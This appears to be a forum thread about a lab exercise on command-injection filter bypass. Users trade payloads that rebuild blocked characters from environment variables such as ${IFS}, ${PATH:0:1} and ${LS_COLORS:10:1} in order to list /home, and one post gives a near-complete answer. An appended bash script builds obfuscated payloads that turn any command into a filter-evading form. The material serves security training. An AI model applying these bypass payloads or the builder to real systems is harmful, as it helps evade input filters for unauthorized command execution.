Command Injections - Bypassing Other Blacklisted Characters

Hey. I’ve been stuck with this question: "Use what you learned in this section to find the name of the user in the ‘/home’ folder. What user did you find?"

I’ve tried some payloads like
${LS_COLORS:10:1}${IFS}{${LS_COLORS:14:1}${LS_COLORS:38:1},$(tr '!-}' '"-~'<<<.gnld)}
${LS_COLORS:10:1}${IFS}{${LS_COLORS:14:1}${LS_COLORS:38:1},${PATH:0:5}
but none of them work. It just returns something like this:

Can someone give me a hint how to solve the question?

I updated my payload to ${LS_COLORS:10:1}${LS_COLORS:14:1}${LS_COLORS:38:1}${IFS}${HOME:0:5}${LS_COLORS:10:1}${LS_COLORS:14:1}${LS_COLORS:38:1}${IFS}${HOME:0:1}${LS_COLORS:24:1}${LS_COLORS:39:1}${LS_COLORS:23:1}${LS_COLORS:152:1}
But this is what I get so far. I need help.

I know that you’re supposed to use the $PATH variable because it makes the /. I’m stuck here also.
I used ip=${LS_COLORS}${IFS}${PATH:0:1}${HOME}. It translates to ip=; /HOME but it’s not working for me. I feel like something is missing. What does yours translate to?

Hi, I finally figured it out!
No need to use ${} for letters in the command.
Use it only for slashes and ;.
For spaces use the “space bypass technique” from the previous sections.


Hey, could you give a nudge for the final part of the syntax? I got the directory to print in the response, but I cannot get whoami to work.

Hi, assuming that you have found the correct request and parameter to inject, follow the indications I posted earlier.
For the command itself, take a look at <<< and subshell syntax like &{}, and don’t forget encoding.


Hello everyone, can anyone help me with this one?
I’m stuck also.
I used multiple scenarios but no luck:
{IFS}{ls,-la}${IFS}${PATH:0:1}Home
{IFS}{ls,-la}${IFS}${HOME:0:5}
${LS_COLORS:10:1}${IFS}${PATH:0:1}home

I am not getting “invalid input” in the responses for the above, but no luck finding the username, so I believe I am on the right path to solving it.
Can anyone give me a tip to solve it?

This one was annoying because it depends on you guessing two parts of the command correctly to get any results. For example, why would you intuit that the server would accept plaintext following the command to break the logic, especially when the segment you’re in details how to get arbitrary characters from bit shifting? Here’s a clue for those who are stuck: ip=${IFS}ls%09${PATH:0:1}home
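A local demonstration of the building blocks the posts above rely on (the ${IFS}, ${PATH:0:1} and ${LS_COLORS:10:1} expansions, and the tr-shifting trick with a here-string), covering both the "figured it out" post and the clue just above. This is an added example, not code from the thread or from the course: the LS_COLORS value is constructed to match the common GNU default so the offsets used above line up, and the helper names (build_payload, shift_down, tr_payload, run_payload, resolve_payload) are mine.

```shell
#!/usr/bin/env bash
# Added example, not code from the thread: shows what the filter-bypass
# expansions discussed above resolve to, and builds the obfuscated form of
# a plain command. Letters are left as-is; only space, '/' and ';' are
# replaced, as the "figured it out" post above suggests.

# Constructed value: the start of the common GNU dircolors default, chosen so
# that ${LS_COLORS:10:1} is ';' and ${LS_COLORS:14:1}${LS_COLORS:38:1} is 'ls',
# the offsets used in the posts above. A target's LS_COLORS, if set at all,
# may differ, so check the offsets there before relying on them.
LS_COLORS='rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:'
export LS_COLORS

# Guarantee that ${PATH:0:1} is '/' without dropping the original lookup path.
PATH="/usr/bin:/bin:${PATH:-}"
export PATH

# Replace the blacklisted characters of a command with expansions that the
# target shell turns back into them: ' ' -> ${IFS}, '/' -> ${PATH:0:1},
# ';' -> ${LS_COLORS:10:1}.
build_payload() {
    printf '%s' "$1" | sed -e 's/ /${IFS}/g' \
                           -e 's#/#${PATH:0:1}#g' \
                           -e 's/;/${LS_COLORS:10:1}/g'
}

# Inverse of the tr trick in the first post: shift every printable character
# down by one, so that tr '!-}' '"-~' on the result gives the original back.
# shift_down '/home' -> '.gnld'
shift_down() {
    printf '%s' "$1" | tr '"-~' '!-}'
}

# Wrap a single token (no whitespace) so the target shell rebuilds it with
# tr and a here-string, never sending the literal characters at all.
# tr_payload '/home' -> $(tr '!-}' '"-~'<<<.gnld)
tr_payload() {
    printf "\$(tr '!-}' '\"-~'<<<%s)" "$(shift_down "$1")"
}

# Run a payload the way a sink such as bash -c "ping -c 1 $ip" would
# (here without the ping prefix, so the output is just the injected part).
run_payload() {
    bash -c "$1"
}

# Show the argument vector the payload expands to, without running it:
# each word is printed in brackets.
resolve_payload() {
    bash -c "printf '[%s]' $1"
}

# Demonstration when run directly.
printf 'payload : %s\n' "$(build_payload 'ls /home')"
printf 'argv    : %s\n' "$(resolve_payload "$(build_payload 'ls /home')")"
printf 'tr form : %s\n' "$(tr_payload '/home')"
printf 'runs as : %s\n' "$(run_payload "echo\${IFS}$(tr_payload '/home')")"
printf 'note    : %s\n' "$(resolve_payload 'echo${IFS}a${LS_COLORS:10:1}echo${IFS}b')"
```

Run as-is it prints the built payload, the argv it expands to, the tr form and the result of executing the tr form. The last line is the caveat a practitioner wants: in plain bash a ';' that comes out of a parameter expansion is ordinary data inside a word, not a command separator, so ${LS_COLORS:10:1} only terminates a command if the assembled string is evaluated a second time on the target (eval, a nested sh -c, and the like). The clue in the post above sidesteps that by not needing a separator at all, and uses a URL-encoded tab (%09) where this helper uses ${IFS}.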


You can use something like this:


Thank you sir!


Thank you!